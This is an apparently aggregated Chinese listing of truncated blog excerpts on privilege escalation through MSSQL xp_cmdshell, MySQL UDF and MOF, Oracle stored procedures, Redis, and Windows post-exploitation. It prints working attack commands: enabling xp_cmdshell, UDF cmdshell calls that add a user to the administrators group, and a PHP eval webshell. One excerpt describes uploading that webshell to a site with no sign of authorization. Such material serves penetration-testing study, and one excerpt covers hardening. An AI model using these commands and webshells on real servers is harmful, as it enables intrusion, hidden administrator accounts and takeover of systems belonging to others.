一.获取Mysql登录账号和密码 1.数据库提权需要知道数据库的账号密码.以及它的配置文件,一般配置文件都在网站的根目录下,这些配置文件命名有鲜明的特征,如:conn.config.data.sql.common.inc等等 以上这些文件都有包含连接数据库的信息,包括连接账号,密码,数据库名等等, 2.如果在这些文件里找不到需要连接数据库的信息,可以到数据库的安装目录下找,默认目录为:C:\phpStudy2016\MySQL\data\mysql,在此目录下找到user.myd文件,里面记录了…
日期:2018-04-03 11:46:45 作者:Bay0net 介绍:利用 mssql 的 sa 账号提权.利用 MySQL 的 UDF 提权 0x01.mssql 提权 恢复 xp_cmdshell 几个命令 # 查看是否存在 xp_cmdshell(返回非 0 即存在) select count(*) from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell'; # 不存在的话可以添加 EXEC sp_addexte…
1.关于 "xp_cmdshell" "存储过程":其实质就是一个"集合",那么是什么样的结合呢,就是存储在SqlServer中预先定义好的"SQL语句集合",说的更直白一些就是使用T-SQL语言编写好的各种小脚本共同组成的集合体,我们称之为"存储过程". 而存储过程中的这些小脚本中,其危险性最高的"小脚本"就是扩展存储过程中的"xp_cmdshell脚本",它可以执…
由于udf提权是需要构造UDF函数文件的,涉及到了写文件.所以本次实验已经将mysql的配置做了改动:–secure-file-priv=''. 剧情须知: secure_file_priv 为 NULL 时,表示限制mysqld不允许导入或导出. secure_file_priv 为 /tmp 时,表示限制mysqld只能在/tmp目录中执行导入导出,其他目录不能执行. secure_file_priv 没有值时,表示不限制mysqld在任意目录的导入导出. 解决方法: 找到'my.cnf'或…
0x01 提权准备 这里我们先创建一个低权限的用户test SQL> conn sys/admin123@orcl as sysdba; 已连接. SQL> create user test identified by test; 然后查看一下权限 SQL> select * from session_privs; PRIVILEGE CREATE SESSION 如上显示,test没有JAVA权限,也只有CREATE SESSION权限 我们如果要通过数据库执行系统命令,那么首先要提升…
0x01 Oracle存储过程”缺陷” 在 Oracle 的存储过程中,有一个有趣的特点:运行权限.运行权限分为两种,definer 和 invoker. definer 为函数创建者的权限,而 invoker 则是当前调用函数的用户.运行权限在函数创建时就已经被钦定了,默认为 definer. 说白了,如果我们用低权限用户去运行DBA权限用户创建的存储过程,我们在调用时就可以额访问DBA资源,使用DBA的权限 Oracle 这样做的初衷,实际上是为了用户互相访问资源时,避免用户凭据的问题.当然…
一.执行java代码 简介 oracle提权漏洞集中存在于PL/SQL编写的函数.存储过程.包.触发器中.oracle存在提权漏洞的一个重要原因是PL/SQL定义的两种调用权限导致(定义者权限和调用者权限).定义者权限给了低权限用户在特定时期拥有高权限的可能,这就给提权操作奠定了基础. 即无论调用者权限如何,执行存储过程的结果权限永远为定义者的权限.因此,如果一个较高权限的用户定义了存储过程,并赋予了低权限用户调用权限,较低权限的用户即可利用这个存储过程提权. Java具有一组非常强大的标准库,…
一.介绍 1.Redis数据库 Redis(Remote Dictionary Server ),即远程字典服务,是一个开源的使用ANSI C语言编写.支持网络.可基于内存亦可持久化的日志型.Key-Value数据库,并提供多种语言的API. 2.漏洞介绍 Redis因配置不当可以导致未授权访问,被攻击者恶意利用.当前流行的针对Redis未授权访问的一种新型攻击方式,在特定条件下,如果Redis以root身份运行,黑客可以给root账户写入SSH公钥文件,直接通过SSH登录受害服务器,可导致服务…
1.关于 “xp_cmdshell” “存储过程”:其实质就是一个“集合”,那么是什么样的结合呢,就是存储在SqlServer中预先定义好的“SQL语句集合”,说的更直白一些就是使用T-SQL语言编写好的各种小脚本共同组成的集合体,我们称之为“存储过程”. 而存储过程中的这些小脚本中,其危险性最高的“小脚本”就是扩展存储过程中的“xp_cmdshell脚本”,它可以执行操作系统的任何指令. 如果我们能够获取SA的管理员权限,我们就可以使用SA的管理权限可以直接执行扩展存储过程中的“xp_cmds…
4.数据库安全基础 4.1.MSSQL 数据库角色权限 sysadmin:执行SQL Server中的任何动作 db_owner:可以执行数据库中技术所有动作的用户 public:数据库的每个合法用户都属于该角色.它为数据库中的用户提供了所有默认权限. 数据库身份验证 SQL Server中的验证方式 Windows身份验证模式 SQL Server和Windows身份验证模式(混合模式) 常用命令 xp_cmdshell 执行命令 exec xp_cmdshell 'dir' sp_confi…
在服务器上如果是 system 用户在运行 MySQL ,这个是非常危险的,一旦Mysql 出现漏洞,或被其他模式提权,直接就是 system 权限.所以我们现在要给MySQL降权! 作用:增强服务器安全,减少服务器被黑的几率 针对MySQL数据库的用户. 我们设置他的“密码不能更改”和“过期”,并且在“隶属于”中删去任何组. 并且右击“我的电脑”-“管理”选择“服务和应用程序”-“服务”中找到“MySQL”(如下图所示), 右击“MySQL”服务“属性”-选择“登陆”选择“此账户”找到MySQ…
一.利用mof提权 前段时间Kingcope大牛发布了mysql远程提权0day,剑心牛对MOF利用进行了分析,如下: Windows 管理规范 (WMI) 提供了以下三种方法编译到 WMI 存储库的托管对象格式 (MOF) 文件: 方法 1: 运行 MOF 文件指定为命令行参数将 Mofcomp.exe 文件. 方法 2: 使用 IMofCompiler 接口和 $ CompileFile 方法. 方法 3: 拖放到 %SystemRoot%\System32\Wbem\MOF 文件夹的 MO…
本文参考自冷逸大佬的博客,源地址在这里:https://lengjibo.github.io/windows%E6%8F%90%E6%9D%83%E6%80%BB%E7%BB%93/ windows提权 windows下的权限: - user - administrator - system 一些常用命令: systeminfo | findstr OS #获取系统版本信息 hostname #获取主机名称 whomai /priv #显示当前用户的安全特权 quser or query use…
MOF提权 MOF文件是mysql数据库的扩展文件(在c:/windows/system32/wbem/mof/nullevt.mof) 叫做”托管对象格式”,其作用是每隔五秒就会去监控进程创建和死亡 MOF提权原理 MOF文件既然每五秒就会执行,而且是系统权限,我们通过mysql将文件写入一个MOF文件替换掉原有的MOF文件,然后系统每隔五秒就会执行一次我们上传的MOF.MOF当中有一段是vbs脚本,我们可以通过控制这段vbs脚本的内容让系统执行命令,进行提权. 利用条件 Windows<=2…
当我们拿到了某个网站SQLServer数据库的SA权限用户密码的话,我们就可以使用XP_CmdShell提权了. 开启xp_cmdshell exec sp_configure 'show advanced options', 1;reconfigure; exec sp_configure 'xp_cmdshell',1;reconfigure; 关闭xp_cmdshell exec sp_configure 'show advanced options', 1;reconfigure; ex…
前言:渗透测试中提权是较为重要的环节,若以低权限身份进行后渗透,测试出的问题相对于高权限的质量会低很多,从一个普通用户,通过手段让自己变为管理员,也可利用操作系统或者应用程序中的错误,设计缺陷或者配置错误来获取最高权限: 提权就是通过各种办法和漏洞,提高自己在服务器中的权限,以便控制全局. Windows:User >> System Linux:User >> Root 提权方式 1.系统漏洞提权(Linux.windows) 2.数据库提权 3.系统配置错误提权 4.权限继承类…
当以低权用户进去一个陌生的windows机器后,无论是提权还是后续做什么,第一步肯定要尽可能的搜集信息.知己知彼,才百战不殆. 常规信息搜集 systeminfo 查询系统信息 hostname 主机名 net user 查看用户信息 netstat -ano|find "3389" 查看服务pid号 wmic os get caption 查看系统名 wmic qfe get Description,HotFixID,InstalledOn 查看补丁信息 wmic product g…
正文开始.... 提权的方法有很多种,因为一开始我入门的时候是看的小迪的网络教程,当然也推荐大家去看小迪的教程,或者直接小迪的实地培训班.这个可没什么利益关系,我认识他,他可不认识我,,但是我是在网上搜集的他的教程看的,要不是他的教程,我肯定入不了门的,,,所以我很感谢他,他的基础原理性的,教的很好,实际操作,可能有点纰漏,但是原理性的真的不错. 提权的方法有很多中,小迪哥,他总结的分类为三类.第一类,溢出提权,也就是exp提权,也就是我们这文在下面将记录的.第二类,数据库提权.第三类,第三方软…
摸鱼的时候,想想内网这部分还有什么地方适合水一下,翻翻往期,开始填坑 总结一下Windows提权的部分,以后有时间再补一下Linux提权 这仍然是一篇思路总结类的随笔,具体细节内容不展开,也展开不了......欢迎去各大社区学习大佬们的操作 关于第三方提权以后再说 0x00前言 常见的Windows权限有三种:user administrator system (当然还有其他的) administrator管理员权限是比较高的,但是如果涉及到读取系统文件,还是要靠system权限 和web提权一…
记一次PHP提权 发现 PHP大马:指木马病毒:PHP大马,就是PHP写的提取站点权限的程序:因为带有提权或者修改站点功能,所以称为叫木马. 自从师哥那里听说过之后,一直感叹于PHP大马的神奇...但一直没有机会. 直到有一天,某同学发来一个学习网站,随便翻了翻感觉嘿嘿嘿!还行...... 试着上传一句话木马 <?php @eval($_POST['a']);?> 呃,显示上传成功...那就上蚁剑,直接连吧. 结果成了,这比我之前想的简单这么多吗??? 既然到这儿了,为什么不试一下PHP大马呢…
cve-2016-6662 MYSQL提权分析 MySQL <= 5.7.15 远程代码执行/ 提权 (0day) 5.6.33 5.5.52 Mysql分支的版本也受影响,包括: MariaDB PerconaDB创建bob用户,并赋予file,select,insert权限,创建用于实验的数据库activedb和表active_table 将exp先写入tmp目录,并编译成so文件,需要修改一下ip,port和my.cnf的位置 select "TYPE=TRIGGERS\ntrigg…
最近在测试一个项目,遇到了MYSQL数据库,想尽办法提权,最终都没有成功,很是郁闷,可能是自己很久没有研究过提权导致的吧,总结一下MYSQL提权的各种姿势吧,权当复习了.关于mysql提权的方法也就那么几种,希望也能帮到各位小伙伴们. 一.利用mof提权 前段时间国外Kingcope大牛发布了mysql远程提权0day(MySQL Windows Remote System Level Exploit (Stuxnet technique) 0day),剑心牛对MOF利用进行了分析,如下: Wi…
一.适用条件 1.目标系统是Windows(Win2000,XP,Win2003): 2.你已经拥有MYSQL的某个用户账号,此账号必须有对mysql的insert和delete权限以创建和抛弃函数(MYSQL文档原语). 3.有mysql账号密码 二.导出udf MYSQL 5.1以下版本导出路径: C:\Winnt\udf.dll    2000C:\Windows\udf.dll 2003(有的系统\被转义,需要改为C:\Windows\\udf.dll) 导出DLL文件,导出时请勿必注意…
mysql提权语句归纳如下: 一 UDF提权 这类提权方法我想大家已经知道了,我大致写一下,具体语句如下: create function cmdshell returns string soname ’udf.dll’ select cmdshell(’net user iis_user 123!@#abcABC /add’); select cmdshell(’net localgroup administrators iis_user /add’); select cmdshell(’re…
1.SA口令的获取 webshell或源代码的获取 源代码泄露 嗅探(用CAIN等工具嗅探1433数据库端口) 口令暴力破解 2.常见SQL server 提权命令 查看数据库的版本(select @@version;) 查看数据库所在服务器操作系统的参数 查看数据库启动的参数 查看数据库启动的时间 查看数据库服务器名和实例名 查看用户登录信息 查看数据库里所所有的存储工程和函数 查看数据库里用户和进程的信息 恢复存储过程 开启和关闭xp_cmdshell xp_cmdshell执行命令 开启和…
一般是root权限,知道mysql root权限,root账号密码 启动项提权:原理:利用高权限的root写入一个vbs脚本到启动项,再通过一些方法如ddos,社工管理员之类的方法来让服务器重启,运行脚本,达到提取目的1.查看我们进入数据库中有些什么数据表mysql>show tables;默认的情况下,test中没有任何表的存在.以下为关键的部分2.在TEST数据库下创建一个新的表:mysql>create table a (cmd text);好了,我们创建了一个新的表,表名为a,表中只存…
今天在来一个mysql提权 (也可以说是默认system权限提的) 在被黑站点找到一个站   先教拿shell是有注入漏洞的 有可能是root权限的注入点 可以确定是有注入漏洞的 也得到了 物理路径 这个是很有用的 如果是root权限的注入点 那我们可以考虑 写shellD:\wamp\www\js\content.php 有时候物理路径是很有用的上sqlmap注入 使用命令 这个是mysql数据库的sqlmap.py -u 注入点 --current-user # /*获取当前用户名称 sql…
获取最高用户root的密码 获取方式:数据库配置文件.端口破解口令.下载数据库文件获取等1.数据库配置文件config,conn,data,sql,include,common,inc等命名文件2.数据库文件获取root的账号密码储存在数据库mysql下的user表中,对应的目录地址../data/mysql/user.myd中 udf提权(小于5.1版本及大于5.1版本)小于5.1版本导出路径:c:/windows大于5.1版本导出路径:../lib/plugin 不存在需创建如果plugin…
先罗列出sql server 角色用户的权限 按照从最低级别角色(bulkadmin)到最高级别角色(sysadmin)的顺序进行描述:1.bulkadmin:这个角色可以运行BULK INSERT语句.该语句允许从文本文件中将数据导入到SQL Server2008数据库中,为需要执行大容量插入到数据库的域帐号而设计.2.dbcreator:这个角色可以创建,更改,删除和还原任何数据库.不仅适合助理DBA角色,也可能适合开发人员角色.3.diskadmin:这个角色用于管理磁盘文件,比如镜像数据…
利用MySQL提权原理: 1.具有mysql的root权限,且mysql以system权限运行. 2.具有执行sql语句的权限,webshell或者外连皆可 UDF提权 UDF(user defined function 用户自定义函数)提权,要求有写权限(secure_file_priv要么为空,要么设置路径),单引号未被过滤 原理: UDF可以理解为MySQL的函数库,可以利用UDF定义创建函数.(其中包括了执行系统命令的函数)要想利用udf,必须上传udf.dll作为udf的执行库. my…